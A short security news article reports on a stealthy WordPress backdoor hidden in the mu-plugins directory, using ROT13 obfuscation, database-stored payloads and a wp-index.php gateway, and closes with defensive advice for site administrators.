Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites
A new form of malware targeting WordPress websites has been discovered, hidden within the mu-plugins directory. This stealthy backdoor uses sophisticated techniques, including ROT13 encryption and database payloads, to evade detection and maintain persistent access to compromised sites.
The mu-plugins directory in WordPress is typically reserved for “must-use” plugins that load automatically and cannot be disabled through the standard plugin interface. Cybercriminals are exploiting this trusted location to plant malicious code that remains active despite routine security scans.
By employing ROT13, a simple letter substitution cipher, the malware obfuscates its payload, making it less visible to conventional security tools. Additionally, the use of database payloads allows the attackers to store malicious commands and scripts within the site’s database, further embedding their presence beyond the reach of standard file-based detection methods.
The backdoor is triggered through a carefully crafted file named wp-index.php, which acts as a covert gateway. This file enables attackers to interact with the infected website remotely, giving them control for extended periods without raising alarms.
Webmasters and site administrators should remain vigilant, particularly by scrutinising the contents of the mu-plugins directory and monitoring unusual files like wp-index.php. Strengthening security measures, including regular updates and thorough scanning, is essential to prevent such sophisticated threats.
This discovery highlights the ongoing need for enhanced awareness and proactive defence strategies in the WordPress ecosystem to safeguard websites from increasingly stealthy and persistent malware attacks.
Source: Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites
Author: Tushar Subhra Dutta
